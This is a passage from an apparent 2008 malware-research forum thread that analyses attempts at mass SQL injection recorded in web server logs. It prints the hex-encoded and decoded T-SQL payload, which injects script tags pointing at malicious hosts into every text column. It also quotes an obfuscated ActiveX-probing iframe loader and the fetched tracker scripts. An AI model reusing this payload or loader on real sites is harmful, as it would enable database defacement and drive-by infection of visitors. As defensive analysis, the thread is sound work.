6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59 from: http://bsalsa.com/ )" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script> </script> <script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script> <iframe src=flash.htm width=100 height=10></iframe> <iframe src=06014.html width=100 height=10></iframe> <iframe src=yahoo.htm width=100 height=10></iframe> <iframe src=office.htm width=100 height=10></iframe> <iframe src=ksx.htm width=100 height=10></iframe> <script src="http://js.users.51.la/2087353.js"></script> <script language="JavaScript">  </script>

Code: [Select]
--11:41:56-- http://www2.1000ylc.cn/csrss/notnew.htm => `notnew.htm' Resolving www2.1000ylc.cn... 121.11.76.85 Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
<script language="JavaScript">  </script> <script src="http://js.users.51.la/2087412.js"></script> <script language="JavaScript">  </script>

Code: [Select]
--11:43:17-- http://s96.cnzz.com/stat.php => `stat.php' Resolving s96.cnzz.com... 219.232.243.5 Connecting to s96.cnzz.com[219.232.243.5]:80... connected HTTP request sent, awaiting response... 200 OK
This returned a 0 byte page

Code: [Select]
--11:44:38-- http://js.users.51.la/2087353.js => `2087353.js' Resolving js.users.51.la... 202.104.236.224 Connecting to js.users.51.la[202.104.236.224]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');

Code: [Select]
--11:46:04-- http://js.users.51.la/2087412.js => `2087412.js' Resolving js.users.51.la... 202.104.236.224 Connecting to js.users.51.la[202.104.236.224]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');
Title: Re: SQL Injected jscript sites
Post by: Orac on August 22, 2008, 11:12:17 am: Sample Log entry, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script> <configuration> <system.web> <customErrors mode="Off"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> <b>×¢ÊÍ:</b> Í¨¹ýÐÞ¸ÄÓ¦ÓÃ³ÌÐòµÄ <customErrors> ÅäÖÃ±ê¼ÇµÄ¡°defaultRedirect¡±ÊôÐÔ£¬Ê¹Ö®Ö¸Ïò×Ô¶¨Òå´íÎóÒ³µÄ URL£¬¿ÉÒÔÓÃ×Ô¶¨Òå´íÎóÒ³Ìæ»»Ëù¿´µ½µÄµ±Ç°´íÎóÒ³¡£<br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>  <configuration> <system.web> <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> </body> </html>

Code: [Select]
--11:48:08-- http://www0.douhunqn.cn/csrss/new.htm => `new.htm' Resolving www0.douhunqn.cn... 121.11.76.85 Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
<script language="JavaScript">  </script> <script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script> <iframe src=flash.htm width=100 height=10></iframe> <iframe src=06014.html width=100 height=10></iframe> <iframe src=yahoo.htm width=100 height=10></iframe> <iframe src=office.htm width=100 height=10></iframe> <iframe src=ksx.htm width=100 height=10></iframe> <script src="http://js.users.51.la/2087353.js"></script> <script language="JavaScript">  </script>

Code: [Select]
--11:51:03-- http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605 => `stat.php?id=1019605&web_id=1019605' Resolving s96.cnzz.com... 219.232.241.133 Connecting to s96.cnzz.com[219.232.241.133]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
function gv_cnzz(of){ var es = document.cookie.indexOf(";",of); if(es==-1) es=document.cookie.length; return unescape(document.cookie.substring(of,es)); } function gc_cnzz(n){ var arg=n+"="; var alen=arg.length; var clen=document.cookie.length; var i=0; while(i<clen){ var j=i+alen; if(document.cookie.substring(i,j)==arg) return gv_cnzz(j); i=document.cookie.indexOf(" ",i)+1; if(i==0) break; } return -1; } var ed=new Date(); var now=parseInt(ed.getTime()); var agt=navigator.userAgent.toLowerCase(); var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362'; var cnzz_a=gc_cnzz("cnzz_a1019605"); if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1; else cnzz_a=0; var rt=parseInt(gc_cnzz("rtime")); var lt=parseInt(gc_cnzz("ltime")); var eid=gc_cnzz("cnzz_eid"); if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer; if(lt<1000000){rt=0;lt=0;} if(rt<1) rt=0; if(((now-lt)>500*86400)&&(lt>0)) rt++; data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height); document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>'); document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>'); var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds()); ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60)); document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/"; ed.setTime(now+1000*86400*182); document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/"; document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/"; document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

Code: [Select]
--11:55:32-- http://js.users.51.la/2087353.js => `2087353.js' Resolving js.users.51.la... 122.224.146.36 Connecting to js.users.51.la[122.224.146.36]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n'); // A Popular Free Statistics Service for 100 000+ Webmasters. window.onerror=function(){return true}; document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');

Code: [Select]
--11:58:01-- http://www.cnzz.com/stat/website.php?web_id=1019605 => `website.php?web_id=1019605' Resolving www.cnzz.com... 127.0.0.1 Connecting to www.cnzz.com[127.0.0.1]:80... connected HTTP request sent, awaiting response... 500
Comment, null rooted by DNS.

Code: [Select]
--11:59:17-- http://222.77.187.203/stat.htm?id=1019605 => `stat.htm?id=1019605' Connecting to 222.77.187.203:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
Power by Cnzz
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 24, 2008, 10:12:03 pm: Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:05 am: Having problems posting this one, will have to split it up

Sample Log entry
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"
Decoded
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 0000] "GET /forums/index.php?showtopic=4260';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script> </script> <script src="http://s123.cnzz.com/stat.php?id=1055584&web_id=1055584" language="JavaScript" charset="gb2312"></script> <iframe src=06014.htm width=100 height=0></iframe> <iframe src=flash.htm width=100 height=0></iframe> <Iframe src=ff.htm width=100 height=0></iframe> <Iframe src=ani.htm width=100 height=0></iframe> <Iframe src=08053.htm width=100 height=0></iframe> <Iframe src=tr.htm width=100 height=0></iframe> <script> var kaspersky="ffuck" var L_czcY_1 = new window["Date"]() L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000) var Jy2$2 = new window["String"](window["document"]["cookie"]) var sX$bhbGk3 = "Cookie1=" var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3) if (zecKZZ4 == -1) { window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]() try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("NCTAudioFile2.AudioFile2.2"))window["document"]["write"]('<iframe style=display:none src=net.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src=xl.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');} catch(e){} aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1; } </script> <script src="http://js.users.51.la/2143797.js"></script> <script language="JavaScript">  </script>

Code: [Select]
--11:53:40-- http://count41.51yes.com/sa.aspx => `sa.aspx' Resolving count41.51yes.com... 222.173.188.45 Connecting to count41.51yes.com[222.173.188.45]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
<html> <head> <title>ÔËÐÐÊ±´íÎó</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Lucida Console";font-size: .9em} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } </style> </head> <body bgcolor="white"> <span><H1>¡°/¡±Ó¦ÓÃ³ÌÐòÖÐµÄ·þÎñÆ÷´íÎó¡£<hr width=100% size=1 color=silver></H1> <h2> <i>ÔËÐÐÊ±´íÎó</i> </h2></span> <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif "> <b> ËµÃ÷: </b>·þÎñÆ÷ÉÏ³öÏÖÓ¦ÓÃ³ÌÐò´íÎó¡£´ËÓ¦ÓÃ³ÌÐòµÄµ±Ç°×Ô¶¨Òå´íÎóÉèÖÃ½ûÖ¹Ô¶³Ì²é¿´Ó¦ÓÃ³ÌÐò´íÎóµÄÏêÏ¸ÐÅÏ¢(³öÓÚ°²È«ÔÒò)¡£µ«¿ÉÒÔÍ¨¹ýÔÚ±¾µØ·þÎñÆ÷¼ÆËã»úÉÏÔËÐÐµÄä¯ÀÀÆ÷²é¿´¡£ <br><br> <b>ÏêÏ¸ÐÅÏ¢:</b> ÈôÒªÊ¹ËûÈËÄÜ¹»ÔÚÔ¶³Ì¼ÆËã»úÉÏ²é¿´´ËÌØ¶¨´íÎóÐÅÏ¢µÄÏêÏ¸ÐÅÏ¢£¬ÇëÔÚÎ»ÓÚµ±Ç° Web Ó¦ÓÃ³ÌÐò¸ùÄ¿Â¼ÏÂµÄ¡°web.config¡±ÅäÖÃÎÄ¼þÖÐ´´½¨Ò»¸ö <customErrors> ±ê¼Ç¡£È»ºóÓ¦½«´Ë <customErrors> ±ê¼ÇµÄ¡°mode¡±ÊôÐÔÉèÖÃÎª¡°Off¡±¡£<br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>  <configuration> <system.web> <customErrors mode="Off"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> <b>×¢ÊÍ:</b> Í¨¹ýÐÞ¸ÄÓ¦ÓÃ³ÌÐòµÄ <customErrors> ÅäÖÃ±ê¼ÇµÄ¡°defaultRedirect¡±ÊôÐÔ£¬Ê¹Ö®Ö¸Ïò×Ô¶¨Òå´íÎóÒ³µÄ URL£¬¿ÉÒÔÓÃ×Ô¶¨Òå´íÎóÒ³Ìæ»»Ëù¿´µ½µÄµ±Ç°´íÎóÒ³¡£<br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>  <configuration> <system.web> <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/> </system.web> </configuration></pre></code> </td> </tr> </table> <br> </body> </html>

Code: [Select]
--11:58:56-- http://s123.cnzz.com/stat.php => `stat.php' Resolving s123.cnzz.com... 219.232.243.4 Connecting to s123.cnzz.com[219.232.243.4]:80... connected HTTP request sent, awaiting response... 200 OK
This loads a zero byte page.

Code: [Select]
--12:00:13-- http://js.users.51.la/2143797.js => `2143797.js' Resolving js.users.51.la... 122.224.146.77 Connecting to js.users.51.la[122.224.146.77]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
document.write ('<a href="http://www.51.la/?2143797" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');

Code: [Select]
--12:03:42-- http://www.51.la/?2143797 => `?2143797' Resolving www.51.la... 222.88.95.2 Connecting to www.51.la[222.88.95.2]:80... connected HTTP request sent, awaiting response... 200 OK
Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /> <style type="text/css"> body {font-size:12px;line-height:120%;font-family:ËÎÌå;word-break: break-all;} a {color: #000;text-decoration: none} a:hover {color: #1653C2} .a1 {color: #1653C2} .a1:hover {color: #000} img {border:none} div {text-align:left} #index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center} #index_menu ul {margin:0px;padding:4px 4px 0px 4px} #index_menu li {display:inline;} #index_menu a {color:#1653C2;padding:4px 15px 4px 15px} #index_menu a:hover {color:#000;background-color:#EFEFEF} #index_menu a.dq {color:#FFF;background-color:#1653C2} #allbody {width:760px;margin: 0 auto} #bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;} </style> <title>usÍ³¼Æ±¨¸æ - ¡°ÎÒÒªÀ²¡±Ìá¹©</title> </head> <body> <div style="margin:20px 0px 20px 0px;text-align:center"><img alt="ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">ÎÒÒªÀ²Ãâ·ÑÍ³¼Æ</a></div> <div id="index_menu"> <ul> <li><a href="http://bbs.51.la/forum-1-1.html">Õ¾³¤½»Á÷´óÌü</a></li> <li><a href="./" class="dq">Ê×Ò³</a></li> <li><a href="reg.asp">ÉêÇë</a></li> <li><a href="login.asp">µÇÂ¼</a></li> <li><a href="http://top.51.la/">ÅÅÐÐ</a></li> <li><a href="news.asp">ÈÕÖ¾</a></li> <li><a href="http://help.51.la/">°ïÖú</a></li> </ul> </div> <div id="allbody"> <div style="line-height:200%;margin:35px;text-align:center"> <a class="a1" href="http://help.51.la/faq/#17">Ê²Ã´ÊÇ¶ÀÁ¢²é¿´ÃÜÂë?</a>  <a class="a1" href="login.asp">¡¾us¡¿µÄÕ¾³¤Çëµã»÷ÕâÀïµÇÂ¼</a><br /> <form action="report/0_help.asp" style="margin:5px 0px 18px 0px"> <center> <input type="hidden" name="id" value="2143797" /> <input type="hidden" name="t" value="chalogin" /> ¶ÀÁ¢²é¿´ÃÜÂë <input name="LookPass" type="password" size="20" /> <input type="submit" value="²é¿´¡¼ us ¡½µÄÍ³¼Æ±¨¸æ" /> </center> </form> <span style="color:red">Çë×¢Òâ: Äú¿ÉÄÜÀ´×ÔÎÒÒªÀ²Ãâ·ÑÍ³¼ÆÓÃ»§µÄÍøÕ¾£¬ÎÒÒªÀ²½öÌá¹©Ãâ·ÑÍ³¼Æ·þÎñ£¬Óë¸ÃÍøÕ¾¾Óª»î¶¯ÎÞ¹Ø¡£</span><br /> <a style="font-size:16px" href="reg.asp">ÉêÇëÄú×Ô¼ºµÄÃâ·ÑÍ³¼ÆÕËºÅ</a> <br /><a href="about.asp" title="ÎªÊ²Ã´Ñ¡ÔñÎÒÒªÀ²Ãâ·ÑÍ³¼Æ">ÁË½âÍøÕ¾ÏÖ×´¡¤°ÑÎÕÍøÕ¾Âö²«¡¤³¬Ô½·¢Õ¹¼«ÏÞ¡ª¡ªÎÒÒªÀ²Í³¼Æ£¬Õ¾³¤ÖÇÃ÷µÄÑÛ¾¦</a> <br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - È« ¹¦ ÄÜ ÑÝ Ê¾ - </a> </div> <div style="width:760px;text-align: center;"> <a href="http://union.wowowang.com/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_wowowang.gif" /></a> <a href="http://www.nicewords.org/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_nicewords.gif" /></a> <a href="http://www.kaikai8.com/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_kaikai8.gif" /></a> <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a> <a href="http://www.zitian.cn/" target="_blank"><img alt="×ÏÌïÍøÂçÆ½¼ÛÓòÃû" src="http://51img.ajiang.net/index_ztdm.gif" /></a> <a href="http://www.jjoobb.cn/" target="_blank"><img alt="¹ã¸æ" src="http://51img.ajiang.net/index_jjoobb.gif" /></a> </div> <div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">ÉÆÕßÎáÉÆÖ®£¬²»ÉÆÕßÎáÒàÉÆÖ®£¬µÃÉÆ¡£ÐÅÕßÎáÐÅÖ®£¬²»ÐÅÕßÎáÒàÐÅÖ®£¬µÃÐÅ¡£<br /> <span id="ajiang_51la"></span>ÉÏÉÆÈôË®¡£Ë®ÀûÍòÎï¶ø²»Õù£¬´¦ÖÚÈËÖ®Ëù¶ñ£¬¹Ë¼¸ÓÚµÀ¡£ </div> <div style="float: left;width:760px;text-align:center;margin-top:12px"> <a class="a1" href="/rule.asp">ÓÃ»§ÊØÔò</a> | <a class="a1" href="/usergetpass.asp">ÕÒ»ØÃÜÂë</a> | <a class="a1" href="/friend.asp">¹ã¸æÁªÏµ</a> | <a class="a1" href="/users.asp">µäÐÍÓÃ»§</a> | <a class="a1" href="/contact.asp">ÁªÏµÎÒÃÇ</a> | <a class="a1" 